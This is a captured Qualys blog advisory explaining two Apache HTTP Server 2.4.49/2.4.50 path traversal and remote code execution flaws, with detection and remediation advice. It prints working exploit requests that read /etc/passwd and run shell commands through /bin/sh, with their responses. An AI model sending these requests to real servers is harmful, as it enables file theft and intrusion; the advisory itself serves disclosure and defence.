blog.qualys.com Open in urlscan Pro
35.230.125.173  Public Scan

URL: https://blog.qualys.com/vulnerabilities-threat-research/2021/10/27/apache-http-server-path-traversal-remote-code-executi...
Submission: On September 30 via api from BG — Scanned from DE

Form analysis 2 forms found in the DOM

POST https://blog.qualys.com/wp-comments-post.php?wpe-comment-post=qualysblog

<form action="https://blog.qualys.com/wp-comments-post.php?wpe-comment-post=qualysblog" method="post" id="commentform" class="comment-form">
  <p class="comment-notes"><span id="email-notes">Your email address will not be published.</span> <span class="required-field-message">Required fields are marked <span class="required">*</span></span></p>
  <p class="comment-form-comment"><label for="comment">Comment</label><textarea id="comment" name="comment" cols="45" rows="6" minlength="10" placeholder="Share your thoughts" aria-required="true" required=""></textarea></p>
  <div class="field-wrapper">
    <p class="comment-form-author"><label for="author">Name</label><input id="author" name="author" type="text" placeholder="Name" value="" size="20" minlength="4" required=""></p>
    <p class="comment-form-email"><label for="email">Email</label><input id="email" name="email" type="email" placeholder="Email" value="" size="30" required=""></p>
  </div>
  <p class="comment-form-cookies-consent"><input id="wp-comment-cookies-consent" name="wp-comment-cookies-consent" type="checkbox" value="yes"> <label for="wp-comment-cookies-consent">Save my name, email, and website in this browser for the next time
      I comment.</label></p>
  <div class="g-recaptcha" data-sitekey="6Lc58QoqAAAAALGk25W8X6NC5w_JwiPPf_JA78rv">
    <div style="width: 304px; height: 78px;">
      <div><iframe title="reCAPTCHA" width="304" height="78" role="presentation" name="a-992jyfsqu7x8" frameborder="0" scrolling="no"
          sandbox="allow-forms allow-popups allow-same-origin allow-scripts allow-top-navigation allow-modals allow-popups-to-escape-sandbox allow-storage-access-by-user-activation"
          src="https://www.google.com/recaptcha/api2/anchor?ar=1&amp;k=6Lc58QoqAAAAALGk25W8X6NC5w_JwiPPf_JA78rv&amp;co=aHR0cHM6Ly9ibG9nLnF1YWx5cy5jb206NDQz&amp;hl=de&amp;v=xds0rzGrktR88uEZ2JUvdgOY&amp;size=normal&amp;cb=46l1jpu2fgu5"></iframe></div>
      <textarea id="g-recaptcha-response" name="g-recaptcha-response" class="g-recaptcha-response" style="width: 250px; height: 40px; border: 1px solid rgb(193, 193, 193); margin: 10px 25px; padding: 0px; resize: none; display: none;"></textarea>
    </div><iframe style="display: none;"></iframe>
  </div>
  <p class="form-submit"><input name="submit" type="submit" id="submit" class="submit" value="POST"> <input type="hidden" name="comment_post_ID" value="28720" id="comment_post_ID">
    <input type="hidden" name="comment_parent" id="comment_parent" value="0">
  </p>
  <p style="display: none;"><input type="hidden" id="akismet_comment_nonce" name="akismet_comment_nonce" value="d293aff105"></p><input type="hidden" id="ct_checkjs_f4b9ec30ad9f68f89b29639786cb62ef" name="ct_checkjs" value="431785138">
  <script>
    setTimeout(function() {
      var ct_input_name = "ct_checkjs_f4b9ec30ad9f68f89b29639786cb62ef";
      if (document.getElementById(ct_input_name) !== null) {
        var ct_input_value = document.getElementById(ct_input_name).value;
        document.getElementById(ct_input_name).value = document.getElementById(ct_input_name).value.replace(ct_input_value, '431785138');
      }
    }, 1000);
  </script>
  <p style="display: none !important;" class="akismet-fields-container" data-prefix="ak_"><label>Δ<textarea name="ak_hp_textarea" cols="45" rows="8" maxlength="100"></textarea></label><input type="hidden" id="ak_js_1" name="ak_js"
      value="1727707007358">
    <script>
      document.getElementById("ak_js_1").setAttribute("value", (new Date()).getTime());
    </script>
  </p><input type="hidden" id="ct_bot_detector_event_token_5890" name="ct_bot_detector_event_token" value="ca508292a08a893fa57a96ab98c10c386dab83b248afabe3ae00610da98cc6fb"><input type="hidden" id="apbct_visible_fields_0" name="apbct_visible_fields"
    value="eyIwIjp7InZpc2libGVfZmllbGRzIjoiY29tbWVudCBhdXRob3IgZW1haWwgYWtfaHBfdGV4dGFyZWEiLCJ2aXNpYmxlX2ZpZWxkc19jb3VudCI6NCwiaW52aXNpYmxlX2ZpZWxkcyI6ImctcmVjYXB0Y2hhLXJlc3BvbnNlIGNvbW1lbnRfcG9zdF9JRCBjb21tZW50X3BhcmVudCBha2lzbWV0X2NvbW1lbnRfbm9uY2UgYWtfanMgY3RfYm90X2RldGVjdG9yX2V2ZW50X3Rva2VuIGN0X25vX2Nvb2tpZV9oaWRkZW5fZmllbGQiLCJpbnZpc2libGVfZmllbGRzX2NvdW50Ijo3fX0="><input
    name="ct_no_cookie_hidden_field"
    value="_ct_no_cookie_data_eyJhcGJjdF9pZnJhbWVzX3Byb3RlY3RlZCI6W10sImN0X3NjcmVlbl9pbmZvIjoiJTdCJTIyZnVsbFdpZHRoJTIyJTNBMTYwMCUyQyUyMmZ1bGxIZWlnaHQlMjIlM0ExMjAyNyUyQyUyMnZpc2libGVXaWR0aCUyMiUzQTE2MDAlMkMlMjJ2aXNpYmxlSGVpZ2h0JTIyJTNBMTIwMCU3RCIsImN0X3BvaW50ZXJfZGF0YSI6IiU1QiU1RCIsImFwYmN0X3BpeGVsX3VybCI6Imh0dHBzJTNBJTJGJTJGbW9kZXJhdGU2LXY0LmNsZWFudGFsay5vcmclMkZwaXhlbCUyRmM4MDhhNzk0MWZlNGFlMmI5OWEyNjFlODk3ZWI4ZTNhLmdpZiIsImFwYmN0X3BhZ2VfaGl0cyI6MSwiY3RfY2hlY2tqcyI6IjQzMTc4NTEzOCIsImN0X3RpbWV6b25lIjoiMiIsImN0X2Nvb2tpZXNfdHlwZSI6Im5vbmUiLCJhcGJjdF92aXNpYmxlX2ZpZWxkcyI6IjAiLCJjdF9wc190aW1lc3RhbXAiOiIxNzI3NzA3MDA3IiwiYXBiY3RfaGVhZGxlc3MiOiJmYWxzZSIsImN0X2ZrcF90aW1lc3RhbXAiOiIwIiwiY3RfY2hlY2tlZF9lbWFpbHMiOiIwIiwiYXBiY3Rfc2Vzc2lvbl9pZCI6Im95enZlciIsImFwYmN0X3Nlc3Npb25fY3VycmVudF9wYWdlIjoiaHR0cHM6Ly9ibG9nLnF1YWx5cy5jb20vdnVsbmVyYWJpbGl0aWVzLXRocmVhdC1yZXNlYXJjaC8yMDIxLzEwLzI3L2FwYWNoZS1odHRwLXNlcnZlci1wYXRoLXRyYXZlcnNhbC1yZW1vdGUtY29kZS1leGVjdXRpb24tY3ZlLTIwMjEtNDE3NzMtY3ZlLTIwMjEtNDIwMTMiLCJ0eXBvIjpbeyJpc0F1dG9GaWxsIjpmYWxzZSwiaXNVc2VCdWZmZXIiOmZhbHNlLCJzcGVlZERlbHRhIjowLCJmaXJzdEtleVRpbWVzdGFtcCI6MCwibGFzdEtleVRpbWVzdGFtcCI6MCwibGFzdERlbHRhIjowLCJjb3VudE9mS2V5IjowfSx7ImlzQXV0b0ZpbGwiOmZhbHNlLCJpc1VzZUJ1ZmZlciI6ZmFsc2UsInNwZWVkRGVsdGEiOjAsImZpcnN0S2V5VGltZXN0YW1wIjowLCJsYXN0S2V5VGltZXN0YW1wIjowLCJsYXN0RGVsdGEiOjAsImNvdW50T2ZLZXkiOjB9XX0="
    type="hidden" class="apbct_special_field ct_no_cookie_hidden_field">
</form>

<form id="jp-carousel-comment-form">
  <label for="jp-carousel-comment-form-comment-field" class="screen-reader-text">Write a Comment...</label>
  <textarea name="comment" class="jp-carousel-comment-form-field jp-carousel-comment-form-textarea" id="jp-carousel-comment-form-comment-field" placeholder="Write a Comment..."></textarea>
  <div id="jp-carousel-comment-form-submit-and-info-wrapper">
    <div id="jp-carousel-comment-form-commenting-as">
      <fieldset>
        <label for="jp-carousel-comment-form-email-field">Email (Required)</label>
        <input type="text" name="email" class="jp-carousel-comment-form-field jp-carousel-comment-form-text-field" id="jp-carousel-comment-form-email-field">
      </fieldset>
      <fieldset>
        <label for="jp-carousel-comment-form-author-field">Name (Required)</label>
        <input type="text" name="author" class="jp-carousel-comment-form-field jp-carousel-comment-form-text-field" id="jp-carousel-comment-form-author-field">
      </fieldset>
      <fieldset>
        <label for="jp-carousel-comment-form-url-field">Website</label>
        <input type="text" name="url" class="jp-carousel-comment-form-field jp-carousel-comment-form-text-field" id="jp-carousel-comment-form-url-field">
      </fieldset>
    </div>
    <input type="submit" name="submit" class="jp-carousel-comment-form-button" id="jp-carousel-comment-form-button-submit" value="Post Comment">
  </div>
  <input type="hidden" id="ct_bot_detector_event_token_5611" name="ct_bot_detector_event_token" value="ca508292a08a893fa57a96ab98c10c386dab83b248afabe3ae00610da98cc6fb"><input name="ct_no_cookie_hidden_field"
    value="_ct_no_cookie_data_eyJhcGJjdF9pZnJhbWVzX3Byb3RlY3RlZCI6W10sImN0X3NjcmVlbl9pbmZvIjoiJTdCJTIyZnVsbFdpZHRoJTIyJTNBMTYwMCUyQyUyMmZ1bGxIZWlnaHQlMjIlM0ExMjAyNyUyQyUyMnZpc2libGVXaWR0aCUyMiUzQTE2MDAlMkMlMjJ2aXNpYmxlSGVpZ2h0JTIyJTNBMTIwMCU3RCIsImN0X3BvaW50ZXJfZGF0YSI6IiU1QiU1RCIsImFwYmN0X3BpeGVsX3VybCI6Imh0dHBzJTNBJTJGJTJGbW9kZXJhdGU2LXY0LmNsZWFudGFsay5vcmclMkZwaXhlbCUyRmM4MDhhNzk0MWZlNGFlMmI5OWEyNjFlODk3ZWI4ZTNhLmdpZiIsImFwYmN0X3BhZ2VfaGl0cyI6MSwiY3RfY2hlY2tqcyI6IjQzMTc4NTEzOCIsImN0X3RpbWV6b25lIjoiMiIsImN0X2Nvb2tpZXNfdHlwZSI6Im5vbmUiLCJhcGJjdF92aXNpYmxlX2ZpZWxkcyI6IjAiLCJjdF9wc190aW1lc3RhbXAiOiIxNzI3NzA3MDA3IiwiYXBiY3RfaGVhZGxlc3MiOiJmYWxzZSIsImN0X2ZrcF90aW1lc3RhbXAiOiIwIiwiY3RfY2hlY2tlZF9lbWFpbHMiOiIwIiwiYXBiY3Rfc2Vzc2lvbl9pZCI6Im95enZlciIsImFwYmN0X3Nlc3Npb25fY3VycmVudF9wYWdlIjoiaHR0cHM6Ly9ibG9nLnF1YWx5cy5jb20vdnVsbmVyYWJpbGl0aWVzLXRocmVhdC1yZXNlYXJjaC8yMDIxLzEwLzI3L2FwYWNoZS1odHRwLXNlcnZlci1wYXRoLXRyYXZlcnNhbC1yZW1vdGUtY29kZS1leGVjdXRpb24tY3ZlLTIwMjEtNDE3NzMtY3ZlLTIwMjEtNDIwMTMiLCJ0eXBvIjpbeyJpc0F1dG9GaWxsIjpmYWxzZSwiaXNVc2VCdWZmZXIiOmZhbHNlLCJzcGVlZERlbHRhIjowLCJmaXJzdEtleVRpbWVzdGFtcCI6MCwibGFzdEtleVRpbWVzdGFtcCI6MCwibGFzdERlbHRhIjowLCJjb3VudE9mS2V5IjowfSx7ImlzQXV0b0ZpbGwiOmZhbHNlLCJpc1VzZUJ1ZmZlciI6ZmFsc2UsInNwZWVkRGVsdGEiOjAsImZpcnN0S2V5VGltZXN0YW1wIjowLCJsYXN0S2V5VGltZXN0YW1wIjowLCJsYXN0RGVsdGEiOjAsImNvdW50T2ZLZXkiOjB9XX0="
    type="hidden" class="apbct_special_field ct_no_cookie_hidden_field">
</form>

Text Content

 * Discussions
   * Back to main menu
   * BROWSE BY TOPICBROWSE BY TOPIC
   * Global IT Asset Management
   * IT Security
   * Compliance
   * Cloud & Container Security
   * Web App Security
   * Certificate Security & SSL Labs
   * Developer API
   * Cloud Platform
   * Start a discussion
 * Blog
 * Training
 * Docs
 * Support
 * Trust
 * 

Community

SearchLoading


Blog Home


APACHE HTTP SERVER PATH TRAVERSAL & REMOTE CODE EXECUTION (CVE-2021-41773 &
CVE-2021-42013)

Mayank Deshmukh, Senior Web Application Signatures Engineer
October 27, 2021December 16, 2022 - 8 min read
27

Last updated on: December 16, 2022

TABLE OF CONTENTS

 * About CVE-2021-41773
 * About CVE-2021-42013
 * Detecting the Vulnerabilities with Qualys WAS
 * Report
 * Solution
 * Credits
 * References:
 * Contributor

On October 4, 2021, Apache HTTP Server Project released Security advisory on a
Path traversal and File disclosure vulnerability in Apache HTTP Server 2.4.49
and 2.4.50 tracked as CVE-2021-41773 and CVE-2021-42013. In the advisory, Apache
also highlighted “the issue is known to be exploited in the wild” and later it
was identified that the vulnerability can be abused to perform remote code
execution. For exploiting both the vulnerabilities Apache HTTP server must be
running in non-default configuration.

FREE TRIAL


GET FULL ACCESS TO THE QUALYS CLOUD PLATFORM FREE

Get the Free Trial

As the vulnerabilities are configuration dependent, checking the version of
Apache web server is not enough to identify vulnerable servers. With both the
CVEs being actively exploited, Qualys Web Application Scanning has released QID
150372, 150373, 150374 which sends specially crafted HTTP request to the target
server to determine if it is exploitable. Once successfully detected, users can
remediate the vulnerabilities by upgrading to Apache HTTP Sever 2.4.51 or
greater.


ABOUT CVE-2021-41773

According to CVE-2021-41773, Apache HTTP Server 2.4.49 is vulnerable to Path
Traversal and Remote Code execution attacks.


PATH TRAVERSAL ANALYSIS

The path traversal vulnerability was introduced due to the new code change added
for path normalization i.e., for URL paths to remove unwanted or dangerous parts
from the pathname, but it was inadequate to detect different techniques of
encoding the path traversal characters “dot-dot-slash (../)”

To prevent path traversal attacks, the normalization function which is
responsible to resolve URL-encoded values from the requested URI, resolved
Unicode values one at a time. Hence when URL encoding the second dot as %2e, the
logic fails to recognize %2e as dot thereby not decoding it, this converts the
characters ../ to .%2e/ and bypasses the check.

Along with Path traversal check bypass, for an Apache HTTP server to be
vulnerable, the HTTP Server configuration should either contain the directory
directive for entire server’s filesystem as Require all granted or the directory
directive should be completely missing from the configuration file.

VULNERABLE CONFIGURATION:

<Directory />
    Require all granted
</Directory>


Therefore, bypassing the dot-dot check as .%2e and chaining it with
misconfigured directory directive allows an attacker to read arbitrary files
such as passwd from the vulnerable server file system.

EXPLOITATION: PATH TRAVERSAL

Request:

GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1



Response:

HTTP/1.1 200 OK
Date: Mon, 18 Oct 2021 08:13:02 GMT
Server: Apache/2.4.49 (Unix)
Last-Modified: Mon, 27 Sep 2021 00:00:00 GMT
ETag: "39e-5cceec7356000"
Accept-Ranges: bytes
Content-Length: 926
Connection: close
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin



Please note that the default configuration of Apache HTTP server has the entire
filesystem directory directive configured as Require all denied and hence is not
vulnerable.


REMOTE CODE EXECUTION ANALYSIS

While CVE-2021-41773 was initially documented as Path traversal and File
disclosure vulnerability additional research concluded that the vulnerability
can be further exploited to conduct remote code execution when mod_cgi module is
enabled on the Apache HTTP server, this allows an attacker to leverage the path
traversal vulnerability and call any binary on the system using HTTP POST
requests.

CONFIGURATION TO ENABLE MOD_CGI MODULE:

<IfModule !mpm_prefork_module>
        LoadModule cgid_module modules/mod_cgid.so
</IfModule>


By default the mod_cgi module is disabled on Apache HTTP server by commenting
the above line in the configuration file. Hence, when mod_cgi is enabled and
“Require all granted” config is applied to the filesystem directory directive
then an attacker can remotely execute commands on the Apache server.

EXPLOITATION: REMOTE CODE EXECUTION

Request:

POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Content-Length: 7
Content-Type: application/x-www-form-urlencoded
Connection: close
echo;id



Response:

HTTP/1.1 200 OK
Date: Mon, 18 Oct 2021 09:58:23 GMT
Server: Apache/2.4.49 (Unix)
Connection: close
Content-Length: 45
uid=1(daemon) gid=1(daemon) groups=1(daemon)



Looking at the HTTP POST request for RCE, we can understand /bin/sh is the
system binary that executes the payload echo;id and print the output of id
command in response.


ABOUT CVE-2021-42013

CVE-2021-42013 was introduced as the fix for CVE-2021-41773 in Apache HTTP
Server 2.4.50 was insufficient as it did not cover double URL encoding,
therefore the vulnerable configurations remained the same, but payload used in
2.4.49 was double URL encoded in 2.4.50 to administer the same path traversal
and remote code execution attack.

The attack in 2.4.49 initially encoded the second dot (.) to %2e and the same
was double URL encoded into %%32%65 for version 2.4.50


ENCODING ANALYSIS

Conversion: dot → %2e → %%32%65

 * 2 is encoded to %32
 * e is encoded to %65
 * And original % left as it is

Thus a dot is equivalent to %%32%65 which eventually converts ../ in double URL
encode format as %%32%65%%32%65/


EXPLOITATION: PATH TRAVERSAL

Request:

GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1



Response:

HTTP/1.1 200 OK
Date: Mon, 18 Oct 2021 10:16:51 GMT
Server: Apache/2.4.50 (Unix)
Last-Modified: Mon, 27 Sep 2021 00:00:00 GMT
ETag: "39e-5cceec7356000"
Accept-Ranges: bytes
Content-Length: 926
Connection: close
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin




EXPLOITATION: REMOTE CODE EXECUTION

Request:

POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 7
echo;id



Response:

HTTP/1.1 200 OK
Date: Mon, 18 Oct 2021 10:42:40 GMT
Server: Apache/2.4.50 (Unix)
Connection: close
Content-Length: 45
uid=1(daemon) gid=1(daemon) groups=1(daemon)




DETECTING THE VULNERABILITIES WITH QUALYS WAS

Customers can detect these vulnerabilities with Qualys Web Application Scanning
using the following QIDs:

 * 150372: Apache HTTP Server Path Traversal (CVE-2021-41773)
 * 150373: Apache HTTP Server Remote Code Execution (CVE-2021-41773)
 * 150374: Apache HTTP Server Multiple Vulnerabilities (CVE-2021-42013)

QID 150372 – Apache HTTP Server Path Traversal (CVE-2021-41773)


REPORT

Once the vulnerability is successfully detected by Qualys WAS, users shall see
similar kind of results for QID 150372 in the vulnerability scan report:


SOLUTION

Organizations using Apache HTTP Server 2.4.49 or 2.4.50 are advised to upgrade
to HTTP Server 2.5.51 or later version to remediate CVE-2021-41773 &
CVE-2021-42013, more information can be referred at Apache Security advisory.

For maintaining best security practices, Qualys also advises users to ensure the
following:

 * mod_cgi module is disabled by default unless the business requires it.
 * filesystem directory directive to be updated with Require all denied as show
   below:

<Directory />
    Require all denied
</Directory>



CREDITS


APACHE SECURITY ADVISORY:

https://httpd.apache.org/security/vulnerabilities_24.html


CVE DETAILS:

https://nvd.nist.gov/vuln/detail/CVE-2021-41773
https://nvd.nist.gov/vuln/detail/CVE-2021-42013


CREDITS FOR THE VULNERABILITY DISCOVERY GO TO:

 * Ash Daulton along with the cPanel Security Team
 * Juan Escobar from Dreamlab Technologies
 * Fernando Muñoz from NULL Life CTF Team
 * Shungo Kumasaka and Nattapon Jongcharoen


REFERENCES:

 * https://twitter.com/ptswarm/status/1445376079548624899
 * https://twitter.com/hackerfantastic/status/1445529822071967745
 * https://attackerkb.com/topics/1RltOPCYqE/cve-2021-41773/rapid7-analysis?referrer=blog


CONTRIBUTOR

Jyoti Raval, Lead Web Application Security Analyst, Qualys

FREE TRIAL


GET FULL ACCESS TO THE QUALYS CLOUD PLATFORM FREE

Get the Free Trial


RELATED

NSA Alert: Topmost CVEs Actively Exploited By People’s Republic of China
State-Sponsored Cyber ActorsOctober 7, 2022In "Vulnerabilities and Threat
Research"

Is Your Web Application Exploitable By Log4Shell Vulnerability?December 15,
2021In "Vulnerabilities and Threat Research"

Identify Server-Side Attacks Using Qualys PeriscopeDecember 1, 2022In "Product
and Tech"

Written by
Mayank Deshmukh, Senior Web Application Signatures Engineer
Write to Mayank at madeshmukh@qualys.com
Like
27
Share
 * 
 * 
 * 
 * 

RELATED CONTENT

apache, CVE, vulnerabilities, WAS, web application scanning
Share your Comments


COMMENTS CANCEL REPLY

Your email address will not be published. Required fields are marked *

Comment

Name

Email

Save my name, email, and website in this browser for the next time I comment.







Δ


JOIN THE DISCUSSION TODAY!

Learn more about Qualys and industry best practices.

Share what you know and build a reputation.

Secure your systems and improve security for everyone.

Start a discussion
 * Twitter
 * LinkedIn
 * Facebook
 * YouTube
 * Vimeo


QUALYS

 * Qualys.com
 * Qualys Community Edition
 * Qualys Merchandise Store


QUALYS COMMUNITIES

 * Vulnerability Management
 * Policy Compliance
 * PCI Compliance
 * Web App Scanning
 * Web App Firewall
 * Continuous Monitoring
 * Security Assessment Questionnaire
 * Threat Protection
 * Asset Inventory
 * AssetView
 * CMDB Sync
 * Endpoint Detection & Response
 * Security Configuration Assessment
 * File Integrity Monitoring
 * Cloud Inventory
 * Certificate Inventory
 * Container Security
 * Cloud Security Assessment
 * Certificate Assessment
 * Out-of-band Configuration Assessment
 * Patch Management
 * Developer API
 * Cloud Agent
 * Dashboards & Reporting


DISCUSSIONS

 * All discussions
 * Global IT Asset Management
 * IT Security
 * Compliance
 * Cloud & Container Security
 * Web App Security
 * Certificate Security & SSL Labs
 * Developer API


BLOG

 * All posts
 * Qualys Insights
 * Product and Tech
 * Vulnerabilities and Threat Research
 * Release Notifications


TRAINING

 * Overview
 * Certified Courses
 * Video Library
 * Instructor-led Training


DOCS

 * Overview
 * Release Notes


SUPPORT

 * Support Portal

© 2024 Qualys, Inc. All rights reserved. Privacy Policy . Accessibility

 

Loading Comments...

 

Write a Comment...
Email (Required) Name (Required) Website


Notice. We use cookies to optimize our website. By continuing to use our site,
you accept our privacy policy.

Yes, I accept Cookies No thanks